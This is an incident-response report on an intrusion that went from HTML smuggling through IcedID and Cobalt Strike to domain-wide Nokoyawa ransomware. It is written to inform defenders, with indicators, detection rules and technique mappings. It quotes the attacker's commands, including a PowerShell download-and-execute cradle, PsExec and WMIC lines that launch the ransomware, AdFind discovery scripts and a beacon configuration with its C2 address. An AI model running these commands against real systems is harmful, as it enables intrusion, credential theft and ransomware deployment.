HTML Smuggling Leads to Domain Wide Ransomware

We’ve previously reported on a Nokoyawa ransomware case in which the initial access was via an Excel macro and IcedID malware. This case, which also ended in Nokoyawa Ransomware, involved the threat actor deploying the final ransomware only 12 hours after the initial compromise.

This threat actor delivered a password protected ZIP file via HTML smuggling to organizations back in late October, early November 2022. Within the password protected ZIP file, there was an ISO file that deployed IcedID which led to the use of Cobalt Strike and ultimately Nokoyawa ransomware. This intrusion also overlaps with the previous Nokoyawa ransomware case.

In early November 2022, the intrusion began with the delivery of an HTML file. We assess with high confidence that the delivery was via email, as reported in other public reports. This HTML file was using a technique known as HTML smuggling. This is one of the techniques threat actors have pivoted to since macro control defaults were updated by Microsoft. Just a month prior, this threat actor was observed using Excel macros in an extremely similar campaign.

Upon the user opening the HTML file, a fake Adobe page was presented and a ZIP file was downloaded. The Adobe lure includes a password for the ZIP as a way to protect the malicious contents from automated analysis. Inside the ZIP was an ISO file. Inside the ISO was the malware payload. The only visible file to the user was a LNK file masquerading as a document.

When the user clicked the LNK file, a series of commands were then executed. These included copying rundll32 and a malicious DLL from within the ISO to the host, before executing the malware. After loading the malicious DLL, a connection was made to IcedID command and control servers. The user meanwhile was served a legitimate image of a finance document.

When the malicious DLL was executed, persistence was also established via a scheduled task on the beachhead host. This task was set to run the IcedID malware every hour on the host. Initial discovery commands were ran seconds after reaching out to the command and control server. These commands have been seen in previous reports involving IcedID, including standard utilities like net, ipconfig, systeminfo, and nltest.

Around three hours after execution of the initial IcedID malware, a cmd process was spawned from IcedID. This new process began beaconing to a Cobalt Strike server. This Cobalt Strike server was previously observed in a prior Nokoyawa report. This process was then observed accessing LSASS, likely to access credentials. A quick check of domain admins using net was also observed.

Hands-on activity then paused for around three hours before the threat actor returned. Using the Cobalt Strike beacon, the threat actor looked up specific domain administrators using the net utility. Using one of those accounts, the threat actor initiated a RDP session to move laterally to a domain controller. Using this session, the threat actor copied over a Cobalt Strike beacon to the domain controller and executed it.

After that, the threat actor continued discovery actions by executing a batch file on the domain controller, which ran the usual battery of Active Directory discovery commands using AdFind. Upon completion, the results of the discovery commands were archived using 7-Zip. This was followed by the threat actor running a second batch file, which iterated through the network performing a nslookup for each host in the environment.

About five hours later, the threat actor returned to the domain controller and executed an encoded PowerShell command which was SessionGopher. SessionGopher is a tool that finds and decrypts saved session information for remote access tools. The threat actor then logged into additional hosts over RDP, including a backup server and a server with file shares. On the backup server, the threat actor opened the backup console. While on the file share, they used notepad to review a file on the host.

The threat actor returned to the domain controller and utilized netscan to perform a network scan. After the scan, both PsExec and WMIC were used to move files across systems in the network. Key files copied included k.exe and p.bat. These two files were the ransomware binary and a batch script that would be used to execute the ransomware.

Five minutes after transferring the files to hosts in the domain, the Nokoyawa ransomware binary was executed on a domain controller. At the same time, PsExec was used to execute the p.bat file starting the ransomware binary on the other hosts in the domain. The time to ransomware (TTR) was just over 12 hours from the initial infection.

Attribution

In this case we see two different threat actors; the distributor and the hands on keyboard actor. Proofpoint tracks this distributor as TA551. The hands on keyboard actor is tracked by Microsoft as Storm-0390 which is a “pen test” team managed by Periwinkle Tempest (formerly tracked as Storm-0193 and DEV-0193).

The ransomware affiliate is seen RDPing into the environment from server name WIN-5J00ETD85P5. This server name matches the one used by a threat actor from a prior Nokoyawa case. We can see from internet scanning tools, this hostname is currently active on 78.128.113[.]154 hosted on AS209160 Miti2000 at 4vendeta.com in Bulgaria.

We offer multiple services including a Threat Feed service which tracks Command and Control frameworks such as Cobalt Strike, Metasploit, Empire, Havoc, etc. More information on this service can be found here.

Our All Intel service includes private mini reports, exploit events, long term infrastructure tracking, clustering, C2 configs, and other curated intel, including non-public case data.

We’ll be launching a private ruleset soon, if you’d like to get in at a discounted rate for the beta, please Contact Us.

If you are interested in hearing more about our services, or would like to talk about a free trial, please reach out using the Contact Us page. We look forward to hearing from you.

Analysts

Analysis and reporting completed by @v3t0_, @AkuMehDFIR, & @RoxpinTeddy

For this campaign, thread hijacked emails were used to deliver the malicious HTML file. According to Proofpoint, this campaign was associated to a distribution group they track as TA551. Credits to Proofpoint for the below example.

After downloading and opening the HTML file, it downloaded a password protected ZIP file with a random name. The password to unzip the file was presented to the user.

The following image shows the HTML file opened in a browser.

The ISO file from the zip, when mounted, had 1 visible LNK file (documents-9771) and 3 hidden files: demurest.cmd, pimpliest_kufic.png and templates544.png.

After execution, a legitimate image is opened to trick the user into thinking nothing is amiss.

The ISO file contained a LNK file, with an icon of an Image, which prompted the user to click on it.When the user opened the LNK file, the batch script demurest.cmd was executed.

The batch script in the demurest.cmd file did the following:

  1. Opened pimpliest_kufic.png, which displayed an image.
  2. The Windows utility xcopy was used to copy rundll32.exe to %temp%entails.exe.
  3. Created string “templates544.png” on the runtime and copied it with a random number with a format: RANDOM_NUM.RANDOM_NUM.
  4. templates544.png was an IcedID DLL and was executed via entails.exe.

We can see from memory (MemProcFS), cmd executes entails.exe, which executes the IcedID dll by looking at the CommandLine. We can also see the call chain of cmd->entails.exe with a grand parent process of explorer.exe

Around six hours into the intrusion, 1.dll (Cobalt Strike) was dropped on the beachhead host before being copied to a domain controller. After 1.dll was transferred to the domain controller, it was executed via rundll32.exe via following command:

rundll32.exe 1.dll, DllRegisterServer

IcedID registered a scheduled task to gain persistence on the beachhead host, which ran every hour.

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <URI>{E5C1C7DB-E36E-5B16-8E3A-6226D7E53A67}</URI>
  </RegistrationInfo>
  <Triggers>
    <TimeTrigger id="TimeTrigger">
      <Repetition>
        <Interval>PT1H</Interval>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
      <StartBoundary>2012-01-01T12:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
    <LogonTrigger id="LogonTrigger">
      <Enabled>true</Enabled>
      <UserId>REDACTED</UserId>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <RunLevel>HighestAvailable</RunLevel>
      <UserId>REDACTED</UserId>
      <LogonType>InteractiveToken</LogonType>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <Duration>PT10M</Duration>
      <WaitTimeout>PT1H</WaitTimeout>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>rundll32.exe</Command>
      <Arguments>"C:UsersREDACTEDAppDataLocalREDACTEDIzjeubaw64.dll",#1 --oyxo="EdgeDecreaselicense.dat"</Arguments>
    </Exec>
  </Actions>
</Task>

We can also see similar information in memory by reviewing most recently created scheduled tasks:

TaskName TaskPath User CommandLine Parameters TimeReg
{E5C1C7DB-E36E-5B16-8E3A-6226D7E53A67} {E5C1C7DB-E36E-5B16-8E3A-6226D7E53A67} Author rundll32.exe “C:UsersREDACTEDAppDataLocalREDACTEDIzjeubaw64.dll”,#1 –oyxo=”EdgeDecreaselicense.dat” 11/REDACTED/2022  11:35:10 AM

 

The compromised user had local administrative privileges on their machine which allowed the threat actor to leverage tools requiring higher permissions.

Looking at the contents of the malicious HTML file, we can pick out the HTML smuggling in the code. First, looking at the <script> tags we come to the following:

If we take that data blob, decode the contents with base64, and export that into a file, we can find the zipped ISO file hidden in the document:

The PK header indicates the data is the start of a zip file, and the following data reveals the contents to be an ISO file.

The initial access package from the threat actor used the Windows xcopy utility to rename rundll32.exe to entails.exe. This was likely to evade detection logic based around command line execution. Entails.exe, which loaded the IcedID DLL, was then observed injecting into a cmd.exe process on the beachhead host.

Below we can see the IcedID loader in memory in the entails.exe process:

Process Name PID Type Address Description
entails.exe 4868 PE_INJECT 0000000180000000 Module:[loader_dll_64.dll]

The entails.exe process first opened cmd.exe with the GrantedAccess of 0x1fffff, which maps to PROCESS_ALL_ACCESS rights, followed by a call to CreateRemoteThread, which was recorded by Sysmon Event ID 10 and 8 respectively as shown below:

We can also see from memory, beacon.dll was injected into cmd.

Process Name PID Type Address Description
cmd.exe 11636 PE_INJECT 0000000005380000 Module:[beacon.dll]

Scanning the process memory of cmd.exe, the YARA rule win_cobalt_strike_auto from Malpedia fired. The following Cobalt Strike beacon configuration was then extracted from process memory:

"BeaconType": "windows-beacon_https-reverse_https",
"Port": 443,
"Sleeptime": 60000,
"Maxgetsize": 1048576,
"Jitter": 0,
"MaxDns": 0,
"PublicKey": "30 81 9f 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 81 8d 00 30 81 89 02 81 81 00 a7 38 cd e7 5f 1f bb 1c 18 64 6c 37 7e 03 01 6b 16 2b 12 ba 72 bd f7 dc 36 b4 cd 2e 4e 9b ae 12 20 5a 95 c2 61 70 bf 90 81 05 ad 7f a4 bb cc fa 79 86 32 26 1b ed 98 70 f9 75 f2 07 94 e1 fe 49 95 23 d7 1f 08 a5 6c ae 03 15 bf de 3d 6c 8a 16 38 6b 03 b7 a6 55 1a a1 33 6d 50 32 5a 35 00 db 27 d7 8a d8 fd 13 b6 a7 3b 9f b7 c3 fb 4d 7a 08 8e 32 3f 07 61 86 56 ec d8 35 95 fa 5f 82 36 13 02 03 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00",
"c2_server": "5.8.18.242,/pixel.gif",
"UserAgent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
"PostURI": "/submit.php",
"Malleable_C2_Instructions2": "",
"HttpGetHeader": "Cookie",
"HttpPostHeader": "nu0026Content-Type: application/octet-streamid",
"SpawnTo": "",
"Pipename": "",
"KillDateYear": 0,
"KillDateMonth": 0,
"KillDateDay": 0,
"DNSIdle": "0.0.0.0",
"DNSSleep": 0,
"SSH_1": "",
"SSH_2": "",
"SSH_3": "",
"SSH_4": "",
"SSH_5": "",
"GetVerb": "GET",
"PostVerb": "POST",
"HttpPostChunk": 0,
"SpawnTox86": "%windir%syswow64rundll32.exe",
"SpawnTox64": "%windir%sysnativerundll32.exe",
"CryptoScheme": 0,
"Proxy": "",
"ProxyUsername": "",
"ProxyPassword": "",
"ProxyType": "IE settings",
"Deprecated": 0,
"LicenseId": 305419776,
"bStageCleanup": 0,
"bCFGCaution": 0,
"KillDate": 0,
"TextSectionEnd": 0,
"ObfuscateSectionsInfo": "",
"ProcessInjectStartRWX": "PAGE_EXECUTE_READWRITE",
"ProcessInjectUseRWX": "PAGE_EXECUTE_READWRITE",
"ProcessInjectMinAlloc": 0,
"ProcessInjectTransformx86": "",
"ProcessInjectTransformx64": "",
"UsesCookies": 1,
"ProcessInjectExecute": "",
"ProcessInjectAllocationMethod": 0,
"ProcessInjectStub": "b5 4a fe 01 ec 6a 75 ed f3 5e 1a 44 f8 bd 39 29",
"HostHeader": ""

The IP and port match what we see in memory:

Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner
0xa30e2a5f34d0 TCPv4 REDACTED 60597 5.8.18.242 443 CLOSED 11636 cmd.exe

The injected cmd.exe, in turn, injected into rundll32.exe.

It appears Cobalt Strike was used to access the LSASS memory space. The access granted was 0x1010 & 0x1fffff. These access patterns were also seen in previous reports here and here. These values can be used to identify credential access.

Pipes were created with the default Cobalt Strike prefix of ‘postex_’

On one of the domain controllers, an encoded PowerShell command was observed being executed from a Cobalt Strike beacon.

This command, once decoded, revealed the execution of the SessionGopher script.

IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:8897/'); Invoke-SessionGopher

After loading IcedID DLL via the renamed rundll32, the following discovery commands were observed on the beachhead host:

cmd.exe /c chcp >&2
ipconfig /all
systeminfo
net config workstation
nltest /domain_trusts
nltest /domain_trusts /all_trusts
net view /all /domain
net view /all
net group "Domain Admins" /domain

As a part of discovery commands, IcedID used WMI to get the list of Anti-Virus product installed on the beachhead host with the following command:

WMIC /Node:localhost /Namespace:rootSecurityCenter2 Path AntiVirusProduct Get * /Format:List

The threat actor also ran the following discovery commands via cmd.exe (injected Beacon process):

net  group "domain admins" /domain
net  user [REDACTED DOMAIN ADMIN] /domain
net  user Administrator /domain
net  user [REDACTED DOMAIN ADMIN] /domain
cmd.exe /C dir *.txt
cmd.exe /C dir *.dll

AdFind was used for discovery on a domain controller via a batch script named adfind.bat. The script executed the following commands:

adfind.exe -f (objectcategory=person) >  ad_users.txt
adfind.exe -f objectcategory=computer > ad_computers.txt
adfind.exe -f (objectcategory=organizationalUnit) > ad_ous.txt
adfind.exe -subnets -f (objectCategory=subnet) > ad_subnets.txt
adfind.exe -f "(objectcategory=group)" > ad_group.txt
adfind.exe -gcb -sc trustdmp >  ad_trustdmp.txt
7.exe a -mx3 ad.7z ad_*
del 7.exe adfind* ad_*

After running this, the threat actor dropped a new batch file ns.bat. This file contained a list of hosts on the network to perform DNS lookups using nslookup.

C:Windowssystem32cmd.exe /C ns.bat
nslookup [REDACTED HOST X]
...
nslookup [REDACTED HOST XX]

Shortly before beginning the ransomware deployment, the threat actor connected to a backup server and opened the backup console on the host. This was followed by final discovery action on the domain controller with the SoftPerfect Netscan tool being used for a final discovery scan across the network.

The threat actor connected to various hosts in the network via RDP tunneled through the beacon process on the beachhead host.

We can find the hostname of the threat actor present in some of the Windows logs, event ID’s 4624, 4776, 4778, and 4779.

WIN-5J00ETD85P5

The workstation name observed in a 4624 event on the beachhead:

Seen again in a 4776 event from a domain controller:

And again in 4778 followed by 4779 on the domain controller:

During the RDP session, 1.dll (Cobalt Strike DLL) was transferred from the beachhead via the Windows File Explorer.

Similarly, the final files used to execute the ransomware deployment were transferred in the same manner, which can be seen via the file creation logging process being Explorer.EXE.

Once k.exe and p.bat, and various other batch scripts were transferred to the compromised domain controller, the threat actor then tried to copy k.exe to other machines on the network via copy command executed on the domain controller.

This command execution may not have worked properly, or as backup the threat actor ran the copy command again, but this time instead of executing cmd /K copy on the domain controller they ran wmic to execute the copy command from the remote host’s instead.

This process was repeated for p.bat, this repetition makes it likely that this was scripted out rather than a failed execution of the copy process.

First, copy command issued on domain controller:

Second, copy command with WMIC for remote hosts to run the command.

Once both k.exe and p.bat were copied to the machines in the network, the threat actor used PsExec.exe to remotely create a service named mstdc to run p.bat (p.bat runs k.exe, which encrypts the system based on the Base64 encoded config) via System account.

Each host on the receiving end of PsExec has a ‘.key’ file created. The filename contains the hostname of the machine that initiated PsExec.

After AdFind had finished executing, the results were archived utilizing 7-Zip.

IcedID

Once entails.exe (rundll32.exe) successfully executed templates544.png on the beachhead host, an outbound connection was established talking to trentonkaizerfak[.]com.

This downloaded a gzip file for the next IcedID stage. After executing this payload, command and control was established to 5.255.103[.]16

IP Port Domain Ja3 Ja3s
5.255.103[.]16 443 pikchayola[.]pics a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc
5.255.103[.]16 443 questdisar[.]com a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc
SSL Certificate Details  
Certificate Subject O=Internet Widgits Pty Ltd,ST=Some-State,C=AU,CN=localhost
Certificate Issuer O=Internet Widgits Pty Ltd,ST=Some-State,C=AU,CN=localhost
Not Before 2022-10-09T09:36:33Z
Not After 2023-10-09T09:36:33Z
Public Algorithm rsaEncryption

Cobalt Strike

After the injection into cmd.exe on the beachhead host, 1.dll (Cobalt Strike DLL) was created, which later was transferred to the domain controller. Then, 1.dll was executed on the domain controller via rundll32.exe and after execution, rundll32.exe connected to the command and control server 5.8.18[.]242. This server was observed in a prior case, which also resulted in Nokoyawa ransomware.

IP Port Ja3 Ja3s
5.8.18[.]242 443 72a589da586844d7f0818ce684948eea f176ba63b4d68e576b5ba345bec2c7b7
SSL Certificate Details  
Certificate Subject CN=,OU=,O=,L=,ST=,C=
Certificate Issuer CN=,OU=,O=,L=,ST=,C=
Not Before 2015-05-20T18:26:24Z
Not After 2025-05-17T18:26:24Z
Public Algorithm rsaEncryption

The threat actor was seen deploying Nokoyawa ransomware throughout the environment utilizing both PSExec & WMIC.

psexec.exe [TARGET IP] -u [DOMAIN][USER] -p "[PASSWORD]" -s -d -h -r mstdc -accepteula -nobanner c:windowstempp.bat
wmic /node:"[TARGET IP]" /user:"[DOMAIN][USER]" /password:"[PASSWORD]" process call create "cmd.exe /c c:windowstempp.bat"

This duplication of execution using both PsExec and WMIC mirrors the doubled commands used to copy files throughout the network, indicating scripted execution for redundancy.

The batch file (p.bat) is responsible for executing the ransomware binary (k.exe) along with its configurations.

 c:windowstempk.exe --config REDACTED

Upon reviewing the configuration provided in the command parameters, this particular ransomware is configured to encrypt the network, load hidden drives, and delete volume shadow copies.

Furthermore, the configuration informs the ransomware binary to skip the following directories and file extensions.

Excluded Directories
- Windows
- Program Files
- Program Files (x86)
- AppData
- ProgramData
- System Volum Information

Excluded File Extensions
- .exe
- .dll
- .ini
- .lnk
- .url
- ""

Ransom Note

Nokoyawa.

If you see this, your files were successfully encrypted.
We advice you not to search free decryption method.
It's impossible. We are using symmetrical and asymmetric encryption.

ATTENTION:
	- Don't rename encrypted files.
	- Don't change encrypted files.
	- Don't use third party software.
	
To reach an agreement we offer you to visit our Onion Website.
How to open Onion links:
	- Download TOR Browser from official website.
	- Open and enter this link:
		http://[REDACTED]
	- On the page you will see a chat with the Support.
	- Send your first message.
	
The faster you contact with us the faster you will get a solution.

Atomic

Cobalt Strike: 
  5.8.18.242:443

IcedID:
  trentonkaizerfak[.]com at 159.89.12.125:80
  questdisar[.]com at 5.255.103.16:443
  pikchayola[.]pics at 5.255.103.16:443

Computed

1.dll
9740f2b8aeacc180d32fc79c46333178
c599c32d6674c01d65bff6c7710e94b6d1f36869
d3db55cd5677b176eb837a536b53ed8c5eabbfd68f64b88dd083dc9ce9ffb64e

8c11812d-65fd-48ee-b650-296122a21067.zip
4f4231ca9e12aafac48a121121c6f940
7bd217554749f0f3c31957a37fc70d0a86e71fc3
be604dc018712b1b1a0802f4ec5a35b29aab839f86343fc4b6f2cb784d58f901

adfind.bat
ebf6f4683d8392add3ef32de1edf29c4
444c704afe4ee33d335bbdfae79b58aba077d10d
2c2513e17a23676495f793584d7165900130ed4e8cccf72d9d20078e27770e04

demurest.cmd
586fe6d361ef5208fad28c5ff8a4579b
bf4177381235393279e7cdfd45a3fa497b7b8a96
364d346da8e398a89d3542600cbc72984b857df3d20a6dc37879f14e5e173522

documents-9771.lnk
51e416c3d3be568864994449cd39caa1
ee1c5e9f1257fbda3b174d534d06dddf435d3327
57842fe8723ed6ebdf7fc17fc341909ad05a7a4feec8bdb5e062882da29fa1a8

k.exe
40c9dc2897b6b348da88b23deb0d3952
0f5457b123e60636623f585cc2bf2729f13a95d6
7095beafff5837070a89407c1bf3c6acf8221ed786e0697f6c578d4c3de0efd6

netscan.exe
16ef238bc49b230b9f17c5eadb7ca100
a5c1e4203c740093c5184faf023911d8f12df96c
ce6fc6cca035914a28bbc453ee3e8ef2b16a79afc01d8cb079c70c7aee0e693f

p.bat
385d21c0438f5b21920aa9eb894740d2
5d2c17799dfc6717f89cd5f63951829aed038041
e351ba5e50743215e8e99b5f260671ca8766886f69d84eabb83e99d55884bc2f

psexec.exe
c590a84b8c72cf18f35ae166f815c9df
b97761358338e640a31eef5e5c5773b633890914
57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4

pimpliest_kufic.png
49524219dbd2418e3afb4e49e5f1805e
b8cb71c48a7d76949c93418ddd0bcae587bef6cc
c6294ebb7d2540ee7064c60d361afb54f637370287983c7e5e1e46115613169a

redacted-invoice-10.31.22.html
c8bdc984a651fa2e4f1df7df1118178b
f62b155ab929b7808de693620d2e9f07a9293926
31cd7f14a9b945164e0f216c2d540ac87279b6c8befaba1f0813fbad5252248b

templates544.png
14f37c8690dda318f9e9f63196169510
306e4ede6c7ea75ef5841f052f9c40e3a761c177
e71772b0518fa9bc6dddd370de2d6b0869671264591d377cdad703fa5a75c338

Network

ET HUNTING Suspicious Empty SSL Certificate - Observed in Cobalt Strike
ET INFO RDP - Response To External Host
ET MALWARE Meterpreter or Other Reverse Shell SSL Cert
ET MALWARE Win32/IcedID Request Cookie
ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)
ET POLICY PsExec service created
ET POLICY SMB Executable File Transfer
ET POLICY SMB2 NT Create AndX Request For a .bat File
ET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement
ET POLICY SMB2 NT Create AndX Request For an Executable File
ET POLICY SMB2 NT Create AndX Request For an Executable File In a Temp Directory
ET RPC DCERPC SVCCTL - Remote Service Control Manager Access
ET SCAN Behavioral Unusual Port 135 traffic Potential Scan or Infection
ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection
ET SCAN Behavioral Unusually fast Terminal Server Traffic Potential Scan or Infection (Inbound)
ET SCAN Behavioral Unusually fast Terminal Server Traffic Potential Scan or Infection (Outbound)

 

Sigma

DFIR Report Repo:

CHCP CodePage Locale Lookup dfbdd206-6cf2-4db9-93a6-0b7e14d5f02f
AdFind Discovery 50046619-1037-49d7-91aa-54fc92923604

Sigma Repo:

Bad Opsec Defaults Sacrificial Processes With Improper Arguments a7c3d773-caef-227e-a7e7-c2f13c622329
Change PowerShell Policies to an Insecure Level 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180
CMD Shell Output Redirect 4f4eaa9f-5ad4-410c-a4be-bc6132b0175a
CobaltStrike BOF Injection Pattern 09706624-b7f6-455d-9d02-adee024cee1d
First Time Seen Remote Named Pipe 52d8b0c6-53d6-439a-9e41-52ad442ad9ad
ISO File Created Within Temp Folders 2f9356ae-bf43-41b8-b858-4496d83b2acb
ISO Image Mount 0248a7bc-8a9a-4cd8-a57e-3ae8e073a073
New Process Created Via Wmic.EXE 526be59f-a573-4eea-b5f7-f0973207634d
Net.exe Execution 183e7ea8-ac4b-4c23-9aec-b3dac4e401ac
Non Interactive PowerShell Process Spawned f4bbd493-b796-416e-bbf2-121235348529
Potential Defense Evasion Via Rename Of Highly Relevant Binaries 0ba1da6d-b6ce-4366-828c-18826c9de23e
Potential Execution of Sysinternals Tools 7cccd811-7ae9-4ebe-9afd-cb5c406b824b
Potential Recon Activity Via Nltest.EXE 5cc90652-4cbd-4241-aa3b-4b462fa5a248
Process Creation Using Sysnative Folder 3c1b5fb0-c72f-45ba-abd1-4d4c353144ab
Psexec Execution 730fc21b-eaff-474b-ad23-90fd265d4988
Rundll32 Execution Without DLL File c3a99af4-35a9-4668-879e-c09aeb4f2bdf
Share And Session Enumeration Using Net.EXE 62510e69-616b-4078-b371-847da438cc03
SMB Create Remote File Admin Share b210394c-ba12-4f89-9117-44a2464b9511
Suspicious Call by Ordinal e79a9e79-eb72-4e78-a628-0e7e8f59e89c
Suspicious Copy From or To System32 fff9d2b7-e11c-4a69-93d3-40ef66189767
Suspicious Encoded PowerShell Command Line ca2092a1-c273-4878-9b4b-0d60115bf5ea
Suspicious Execution of Hostname 7be5fb68-f9ef-476d-8b51-0256ebece19e
Suspicious Group And Account Reconnaissance Activity Using Net.EXE d95de845-b83c-4a9a-8a6a-4fc802ebf6c0
Suspicious Manipulation Of Default Accounts Via Net.EXE 5b768e71-86f2-4879-b448-81061cbae951
Suspicious Network Command a29c1813-ab1f-4dde-b489-330b952e91ae
Suspicious Process Created Via Wmic.EXE 3c89a1e8-0fba-449e-8f1b-8409d6267ec8
Suspicious Rundll32 Without Any CommandLine Params 1775e15e-b61b-4d14-a1a3-80981298085a
WMIC Remote Command Execution 7773b877-5abb-4a3e-b9c9-fd0369b59b00
WmiPrvSE Spawned A Process d21374ff-f574-44a7-9998-4a8c8bf33d7d
CobaltStrike Named Pipe d5601f8c-b26f-4ab0-9035-69e11a8d4ad2
Suspicious Execution of Systeminfo 0ef56343-059e-4cb6-adc1-4c3c967c5e46

Yara

https://github.com/The-DFIR-Report/Yara-Rules/blob/main/14335/14335.yar#L184-L203

https://github.com/The-DFIR-Report/Yara-Rules/blob/main/18190/18190.yar#L12-L43

https://github.com/The-DFIR-Report/Yara-Rules/blob/main/18190/18190.yar#L45-L76

https://github.com/The-DFIR-Report/Yara-Rules/blob/main/1013/1013.yar#L72-L103

https://github.com/The-DFIR-Report/Yara-Rules/blob/main/18543/18543.yar

PsExec - S0029
AdFind - S0552
Net - S0039
Systeminfo - S0096
ipconfig - S0100
Nltest - S0359
Malicious File - T1204.002
Scheduled Task - T1053.005
Web Protocols - T1071.001
Data Encrypted for Impact - T1486
LSASS Memory - T1003.001
System Network Configuration Discovery - T1016
System Information Discovery - T1082
System Language Discovery - T1614.001
Remote System Discovery - T1018
Local Groups - T1069.001
Local Account - T1087.001
Domain Trust Discovery - T1482
Domain Groups - T1069.002
Domain Account - T1087.002
Network Share Discovery - T1135
Security Software Discovery - T1518.001
Remote Desktop Protocol - T1021.001
Lateral Tool Transfer - T1570
SMB/Windows Admin Shares - T1021.002
Match Legitimate Name or Location - T1036.005
Process Injection - T1055
Rundll32 - T1218.011
Archive Collected Data - T1560
HTML Smuggling - T1027.006
Valid Accounts - T1078
Credentials in Files - T1552.001
Credentials in Registry - T1552.002
PowerShell - T1059.001
Windows Command Shell - T1059.003
Windows Management Instrumenation - T1047
Spearphishing Attachement - T1566.001

DFIR Report Tracking

SoftPerfect Network Scanner
Cobalt Strike
IcedID

Internal case # 18543

Source: https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/